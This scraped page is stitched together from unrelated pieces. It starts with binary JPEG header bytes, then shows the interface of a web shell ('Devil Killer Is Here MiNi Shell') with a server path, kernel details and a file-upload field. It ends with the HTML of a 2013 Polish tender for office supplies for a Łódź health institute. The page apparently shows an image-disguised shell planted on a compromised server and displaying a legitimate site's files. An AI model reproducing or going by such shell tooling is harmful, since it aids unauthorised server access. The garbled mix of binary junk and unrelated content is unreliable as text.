JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130415/147990-N-2013.html

<p class="kh_header"><b>Łódź: ZP/49/2013 Dostawa artykułów biurowych i piśmiennych dla  Instytutu CZMP</b><br>
<b>Numer ogłoszenia: 147990 - 2013; data zamieszczenia: 15.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut "Centrum Zdrowia Matki Polki" - Samodzielna Sekcja Zamówień Publicznych , ul. Rzgowska 281/289, 93-338 Łódź, woj. łódzkie, tel. 42 2711188, 2711069, faks 42 2711187.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iczmp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/49/2013 Dostawa artykułów biurowych i piśmiennych dla  Instytutu CZMP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br/>ZP/49/2013 Dostawa artykułów biurowych i piśmiennych dla Instytutu CZMP
<br/>PAKIET 1 - Papier utajniony i składanki komputerowe
<br/>1.Papier utajniony - 3 składnikowy z perforacją, w kształcie kopert 210x 12/6(1+2) - 96 000 szt.
<br/>2.Składanka komputerowa 240x12 (1+2) - 72 op.
<br/>3.Składanka komputerowa 240x12 (1+3) - 88 op.
<br/>4.Składanka komputerowa 250x12 (1+0) - 10 op.
<br/>5.Składanka komputerowa 390x12 (1+0) - 12 op.
<br/>6.Składanka komputerowa 390x12 (1+1) - 12 op.
<br/>7.Składanka komputerowa 390x12 (1+2) - 6 op.
<br/>8.Składanka komputerowa 390x12 (1+3) - 2 op.
<br/>PAKIET 2 - Torby papierowe z atestem
<br/>1.Torba papierowa, biała, krzyżowa 0,25 kg - 40 kg
<br/>2.Torba papierowa, biała, krzyżowa 0,50 kg - 20 kg
<br/>PAKIET 3 - Papier ksero
<br/>1.Papier ksero format A-4; gramatura 80g/m2 /1 ryza - 500 arkuszy/ - 7 200 ryz
<br/>2.Papier ksero format A-4; gramatura 80g/m2, kolor /1 ryza - 500 arkuszy/ - 40 ryz
<br/>3.Papier ksero format A-3; gramatura 80g/m2 /1 ryza - 500 arkuszy/ - 200 ryz
<br/>4.Papier ksero format A-5; gramatura 80g/m2 /1 ryza - 500 arkuszy/ - 1 440 ryz
<br/>PAKIET 4 - Rolki do faksu i kas
<br/>1.Rolki fax 216x30 - 160 szt.
<br/>2.Rolki fax 210x30 - 220 szt.
<br/>3.Rolki kasowe 57x25 - 160 szt.
<br/>PAKIET 5 - Etykiety uniwersalne do drukarek
<br/>1.Etykiety uniwersalne do drukarek 88,9x35,7; jednorzędowe /op.-1 000 naklejek/ - 4op.
<br/>2.Etykiety samoprzylepne na arkuszu A-4 70x 42,3 /op.-100 arkuszy/ - 2 op.
<br/>3.Etykiety samoprzylepne na arkuszu A-4 105 mm x 148,5 mm /op. - 100 arkuszy/ - 2 op. 
<br/>4.Etykiety samoprzylepne na arkuszu A-4 105 mm x 74,2 mm /op. - 100 arkuszy/ - 2 op.
<br/>5.Etykiety samoprzylepne na arkuszu A-4 66 mm x 33,8 mm /op. - 100 arkuszy/ - 2 op.
<br/>6.Etykiety samoprzylepne na arkuszu A-4 105 mm x 37 mm /op. - 100 arkuszy/ - 4 op.
<br/>7.Etykiety samoprzylepne na arkuszu A-4 210 mm x297 mm /op. - 100 arkuszy/ - 4 op.
<br/>8.Etykiety samoprzylepne na arkuszu A-4 105 mm x 48 mm /op. 100 arkuszy/-4 op.
<br/>PAKIET 6 - Koperty białe
<br/>1.Koperty białe C-6 samoprzylepne - 24 000 szt.
<br/>2.Koperty białe C-5 samoprzylepne - 24 000 szt.
<br/>3.Koperty białe C-4 samoprzylepne - 40 000 szt.
<br/>4.Koperty białe B-5 samoprzylepne - 48 000 szt.
<br/>5.Koperty białe B-4 samoprzylepne - 6 000 szt.
<br/>6.Koperty białe DL samoprzylepne z okienkiem /prawym lub lewym wg.zapotrzebowania - 2 000 szt.
<br/>7.Koperty białe DL samoprzylepne  - 2 000 szt.
<br/>PAKIET 7 - Blok makulaturowy, zeszyty, papier podaniowy, kostki klejone, skorowidz
<br/>1.Blok makulaturowy A-4 - 96 kart. (kratka) - 400 szt.
<br/>2.Blok makulaturowy A-5 - 96 kart (kratka) - 200 szt.
<br/>3.Zeszyt A-5 16 kartkowy szyty (kratka) - 300 szt.
<br/>4.Zeszyt A-5 32 kartkowy szyty (kratka) - 500 szt.
<br/>5.Zeszyt A-5 60 kartkowy szyty (kratka) - 700 szt.
<br/>6.Zeszyt A-5 96 kartkowy szyty, sztywna okładka (kratka) - 500 szt.
<br/>7.Zeszyt A-4 96 kartkowy szyty, sztywna okładka (kratka) - 600 szt.
<br/>8.Zeszyt A-4 192 kartkowy szyty, sztywna okładka (kratka) - 200szt
<br/>9.Papier pakowy szary 125 cm x 100 cm - 40 kg
<br/>10.Kostki klejone 92 x 77 x 60/1op.-500 kartek klejonych/ - 100 op.
<br/>11.Bloczki samoprzylepne 75 x 75 /1bl. - 100 kartek/ - 100 bl.
<br/>12.Skorowidz A-4 - 20 szt.
<br/>13.Skorowidz 1/2 A-4 - 10 szt.
<br/>14.Zestaw zakładek samoprzylepnych indeksujących foliowych, w zestawie min. 100 zakładek w różnych kolorach, min trzy kolory - 400 zest.
<br/>15.Zestaw zakładek samoprzylepnych indeksujących z oznaczeniem na podpis, wymiary 20x50 mm, w zetawie min.100 zakładek w różnych kolorach, min trzy kolory - 20 zest.
<br/>16.Przekładki do segregatora kartonowe 240x105 mm / op. 100 szt/ - 6 op.
<br/>17.Wąsy do skoroszytów - 200 szt.
<br/>PAKIET 8 - Długopisy, mazaki, markery, foliopis, cienkopisy, ołówki, rysiki,wkłady do długopisów i cienkopisów, zakreślacze
<br/>1.Długopis typu Zenith - 200 szt.
<br/>2.Długopis na przylepce - leżące - 6 szt.
<br/>3.Mazaki wodoodporne czarne z końcówką stożkową - pernamentne, spirytusowe - 2 400 szt
<br/>4.Markery zdobnicze, olejowe do pisania na metalu, szkle, plastiku i gumie - grubość pisania 0,4 mm - 0,2 mm /kolor: czarny, biały, srebny, złoty/ - 60 szt.
<br/>5.Cienkopis permanentny, wodoodporny do pisania na szkle o grub. 0,4mm, czarny - 100 szt
<br/>6.Marker wodoodporny szybkoschnący, do pisania na metalu, szkle, plastiku, folii, standardowy 0,4 mm - 60 szt.
<br/>7.Marker wodoodporny szybkoschnący, nadający się do pisania na metalu, szkle, plastiki, folii, cienkopiszący 0,2 mm - 60 szt.
<br/>8.Foliopis do pisania na płytach CD - 200 szt.
<br/>9.Mazaki zwykłe/kolory wg. zamówienia/-300 szt.
<br/>10.Cienkopis żelowy z wkładem wymiennym 0,5 mm - 200 szt.
<br/>11.Ołówki HB z gumką - 1000 szt
<br/>12.Ołówek automatyczny 0,5 mm HB -10 szt.
<br/>13.Rysiki - grafity do ołówków automatycznych 0,5 mm HB - 10 op.
<br/>14.Wkład typu Zenith/kolory wg. zamówienia/ - 1 200 szt.
<br/>15.Wkład zwykły /kolory wg. zamówienia/ - 1 200 szt.
<br/>16.Wkłady do posiadanych przez Zamawiającego piór kulkowych Parker  Roller Ball - 05 mm, kolor niebieski - 20 szt.
<br/>17.Naboje do posiadanych przez Zamawiającego piór Waterman - niebieskie (op. 8szt) - 10 op.
<br/>18.Wkłady do cienkopisów żelowych 0,5 mm (kolory wg zamówienia) - 200 szt.
<br/>19.Zakreślacze /kolory wg. zamówienia/ - 200 szt.
<br/>PAKIET 9 - Korektory
<br/>1.Korektor w płynie z gąbką 20 ml - 300 szt.
<br/>2.Korektor w taśmie 4.2 mm x 6 m - 60 szt
<br/>PAKIET 10 - Poduszki i tusz do stempli, tusz do numeratora, wkład do numeratora automatycznego, maczałka.
<br/>1.Poduszka do stempli duża /160 mm x 90 mm/ - 40 szt.
<br/>2.Poduszka do stempli samotuszująca mała /90 mm x 50 mm/ - 40 szt.
<br/>3.Tusz do stempli 50ml automat /kolory wg. zamówienia/ - 360 szt.
<br/>4.Tusz do numeratora /kolory wg. zamówienia/ - 8 szt.
<br/>5.Wkład do posiadanego przez Zamawiajacego numeratora automatycznego REINER B6K - 10 szt.
<br/>6.Zwilżacz do palców - 10 szt.
<br/>PAKIET 11 - Pinezki, spinacze metalowe
<br/>1.Pinezki /op 100 szt./ - 10 op.
<br/>2.Spinacze metalowe duże /op -100 szt./ - 200 op.
<br/>3.Spinacze metalowe trójkątne małe /op.-100 szt./ - 2 400 op.
<br/>4.Spinacze typu klip 7 mm - 48 szt.
<br/>5.Spinacze typu klip 15 mm - 48 szt.
<br/>PAKIET 12 - Temperówki, nożyczki, gumki, linijki, klej biurowy
<br/>1.Temperówka - 100 szt.
<br/>2.Nożyczki 19 cm - 100 szt.
<br/>3.Gumka - 300 szt.
<br/>4.Linijka 30 cm - 100 szt.
<br/>5.Linijka 50 cm - 20 szt.
<br/>6.Klej biurowy w płynie 40 ml - 600 szt.
<br/>PAKIET 13 - Dziurkacze, zszywacze, zszywki
<br/>1.Dziurkacz - 60 szt
<br/>2.Dziurkacz duży, żeliwny - 10 szt
<br/>3.Zszywacz - 200 szt.
<br/>4.Zszywacz mini - 20 szt.
<br/>5.Zszywacz do 100 kartek - 2 szt.
<br/>6.Zszywki specjalistyczne do zszywacza zszywającego 100 kartek (op-1000 szt.)-24 op.
<br/>7.Zszywki 24/6 (op-1000 szt) - 2 000 op.
<br/>8.Zszywki mini No 10 (op - 1000 szt) - 100 op.
<br/>PAKIET 14 - Datownik automatyczny, numerator automatyczny
<br/>1.Datownik automatyczny - 80 szt.
<br/>2.Numerator automatyczny, obudowa plastikowa, metalowa czcionka, na 5 ostatnich pierścieniach opcja powtarzania numeru 0,1-6,12 i 20 razy, na każdym pierścieniu opcje 10 cyfr i puste pole, wysokość cyfr 4,5 mm - 4 szt
<br/>PAKIET 15 - Kalka maszynowa, taśmy różne
<br/>1.Kalka maszynowa A-4 -czarna/op.-100 szt./ - 14op.
<br/>2.Wałek barwiący do posiadanego przez Zamawiającego kalkulatora Casio FR -520 B - 20 szt
<br/>3.Taśma /13 mm x 6m/ czerwono-czarna - 40 szt.
<br/>4.Taśma do posiadanych przez Zamawiającego metkownic typu Biltz C-20 /2 wierszowa/ - 2 400 szt
<br/>5.Taśma klejąca przezroczysta 18mm/20m - 1 000 szt.
<br/>6.Taśma klejąca przezroczysta 25mm/20m - 40 szt.
<br/>7.Taśma pakowa plastikowa szer. 48 mm x 66 m  - 600 szt.
<br/>8.Taśma dwustronnie klejąca 18 mm x 5 m - 40 szt.
<br/>9.Taśma dwustronnie klejąca 24 mm x 5 m - 40 szt.
<br/>PAKIET 16 - Koszulki foliowe, segregatory, skoroszyty, teczki
<br/>1.Koszulki foliowe A-4 /op.-100 szt./ przezroczyste z grzbietem do wpinania - 800 op.
<br/>2.Koszulki foliowe A-5 /op.-100 szt./przezroczyste z grzbietem do wpinania - 200 op.
<br/>3.Segregator A-4 - szeroki, pokryty PCV - 2 000 szt.
<br/>4.Segregator A-4 - wąski, pokryty PCV - 400 szt.
<br/>5.Segregatory A-5 - szeroki, pokryty PCV - 300 szt.
<br/>6.Skoroszyt plastikowy z przezroczystą okładką z grzbietem do wpinania - 4 000 szt.
<br/>7.Teczka tekturowa A-4 biała - bigowany grzbiet, wiązana - 80 000 szt.
<br/>8.Teczka do podpisu harmonijkowa - 60 szt.
<br/>9.Teczka plastikowa A-4, wiązana - 1200 szt
<br/>PAKIET 17 - Tuby na rysunki
<br/>1.Tuby na rysunki regulowane z polipropylenu, kolor niebieski, format A-3-A-1, od 35-62 cm - 100 szt
<br/>PAKIET 18 - Koperty z rozszerzonym dnem
<br/>1.Koperty białe C4 HK z rozszerzonym dnem - 200 szt.
<br/>PAKIET 19 - Koperty szare, podkładki, okładki skoroszytowe
<br/>1.Podkładka pod kartę gorączkową A 3, wykonana za sztywnej tektury pokrytej laminatem, zakończona na rogach zakładkami utrzymującymi kartkę. Podkładka o wymiarach 41 cm/30cm/ grubość ok. 3 mm -  wg. wzoru stanowiącego załącznik do SIWZ - 600 szt.
<br/>2.Okładka skoroszytowa, kartonowa,do archiwizacji 50 cm x 32 cm, grzbiet harmonijka 7 cm - 600 szt
<br/>3.Koperty szare bez nadruku  rozm. 37 cm x 47 cm - 10000 szt.
<br/>4.Koperty szare RTG bez nadruku rozm. 29 cm x 34 cm - 2000 szt.
<br/>5.Koperty szare senologiczne z nadrukiem, rozm.30,5 x 22 /boki koperty wzmocnione oprawą introligatorską - wg. wzoru stanowiącego załącznik SIWZ - 4000 szt
<br/>6.Koperty szare ortopedyczne z nadrukiem, rozm. 45,5 x 37,5 - wg. wzoru stanowiącego załącznik do SIWZ - 2 000 szt.
<br/>PAKIET 20. - Identyfikator
<br/>1.Identyfikator z przezroczystego, sztywnego tworzywa, wyposażony w klips sprężynujący i niewielką agrafkę, (w kpl. kartonik z wydrukowaną ramką) - 200 szt
<br/>PAKIET 21 - Papiery, kartony ozdobne
<br/>1.Karton ozdobny A4 gramatura 200 g/m2 marmurek - kolor w.g zamówień - 200 ark.
<br/>2.Papier biały satynowy A3 o gramaturze 220-300 gładki / op. 250 arkuszy / - 2 op. 
<br/>3.Papier biały satynowy A4 o gramaturze 250 gładki / op. 250 arkuszy / - 4 op.
<br/>4.Przezroczysta folia A4 do wydruków atramentowych - 20 szt.
<br/>5.Karton ozdobny A4 gramatura 25-280 g/m2 biały, tłoczony - kolor w.g zamówień - 400 ark.
<br/>PAKIET 22 - Podkładki pergaminowe
<br/>1.Podkładki pergaminowe o średnicy 48 mm /op.100 szt./-10 op.
<br/>2.Podkładki pergaminowe o średnicy 75 mm /op. 100 szt./-10 op.
<br/>3.Podkładki pergaminowe o średnicy 112 mm /op.100 szt./-10 op.
<br/>PAKIET 23 - Grzbiety do bindowania
<br/>1.Grzbiety do bindowania plastikowe  19 mm - 400 szt.
<br/>2.Grzbiety nasuwane do bindowania plastikowe 3 - 60 kartek - 100 szt
<br/>3.Listwa wsuwana do bindowania /z okładką/ - 40 szt
<br/>4.Folia do laminowania 100 mic. 65x95 - 30 op
<br/>PAKIET 24 - Szuflady na dokumenty
<br/>1.Szuflada na dokumenty plastikowe, schodkowe - 100 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> <br/>Zamawiający wymaga wniesienia wadium
<br/>Dla Pakietu Nr 1 -789,82 PLN (słownie: siedemset osiemdziesiąt dziewięć PLN 82/100);
<br/>Dla Pakietu Nr 2 - 11,40 PLN (słownie: jedenaście PLN 40/100);
<br/>Dla Pakietu Nr 3 - 2.429,52 PLN (słownie: dwa tysiące czterysta dwadzieścia dziewięć PLN 52/100);
<br/>Dla Pakietu Nr 4 - 41,92 PLN (słownie: czterdzieści jeden PLN 92/100);
<br/>Dla Pakietu Nr 5 - 22,86 PLN (słownie: dwadzieścia dwa PLN 86/100)
<br/>Dla Pakietu Nr 6 - 372,00 PLN (słownie: trzysta siedemdziesiąt dwa PLN 00/100)
<br/>Dla Pakietu Nr 7 - 393,72 PLN (słownie: trzysta dziewięćdziesiąt trzy PLN 72/100)
<br/>Dla Pakietu Nr 8 - 113,52 PLN (słownie: sto trzynaście PLN 52/100)
<br/>Dla Pakietu Nr 9 - 31,50 PLN (słownie: trzydzieści jeden PLN 50/100)
<br/>Dla Pakietu Nr 10 - 97,86 PLN (słownie: dziewięćdziesiąt siedem PLN 86/100)
<br/>Dla Pakietu Nr 11- 33,84 PLN (słownie: trzydzieści trzy PLN 84/100)
<br/>Dla Pakietu Nr 12- 35,55 PLN (słownie: trzydzieści pięć PLN 55/100)
<br/>Dla Pakietu Nr 13- 77,49 PLN (słownie: siedemdziesiąt siedem PLN 49/100)
<br/>Dla Pakietu Nr 14- 45,12 PLN (słownie czterdzieści pięć PLN 12/100)
<br/>Dla Pakietu Nr 15- 132,49 PLN (słownie: sto trzydzieści dwa PLN 49/100)
<br/>Dla Pakietu Nr 16- 1.322,40 PLN (słownie: jeden tysiąc trzysta dwadzieścia dwa PLN 40/100)
<br/>Dla Pakietu Nr 17- 60,00 PLN (słownie: sześćdziesiąt PLN 00/100)
<br/>Dla Pakietu Nr 18- 5,28 PLN (słownie: pięć PLN 28/100)
<br/>Dla Pakietu Nr 19- 758,40 PLN (słownie: siedemset pięćdziesiąt osiem PLN 40/100)
<br/>Dla Pakietu Nr 20- 3,30 PLN (słownie: trzy PLN 30/100)
<br/>Dla Pakietu Nr 21- 27,00 PLN (słownie: dwadzieścia siedem PLN 00/100)
<br/>Dla Pakietu Nr 22- 2,88 (słownie: dwa PLN 88/100)
<br/>Dla Pakietu Nr 23- 18,60 PLN (słownie: osiemnaście PLN 60/100)
<br/>Dla Pakietu Nr 24- 24,00 PLN (słownie: dwadzieścia cztery PLN 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o podwykonawstwie - jeżeli Wykonawca przewiduje wykonanie zamówienia z udziałem podwykonawców</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p><br/>Na podstawie art.144 ust. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:
<br/>1.zmiany nazwy lub numeru katalogowego lub nazwy produktu przy zachowaniu jego parametrów;
<br/>2.niewykorzystania ilości w okresie trwania umowy - Zamawiający przewiduje możliwość zmiany terminu obowiązywania umowy;
<br/>3.przedmiotowym / produkt zamienny jeśli wystąpi brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową;
<br/>4.zmiany organizacyjnej Instytutu CZMP istotnej dla realizacji niniejszej umowy;
<br/>5.zmiany formy prawnej prowadzonej działalności gospodarczej;
<br/>6.zmiany adresu siedziby firmy, zmiany adresu zamieszkania właściciela lub współwłaściciela firmy;
<br/>7.zmiany przedmiotu umowy poprzez zmianę producenta przy zachowaniu dotychczasowych parametrów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iczmp.edu.pl<br>
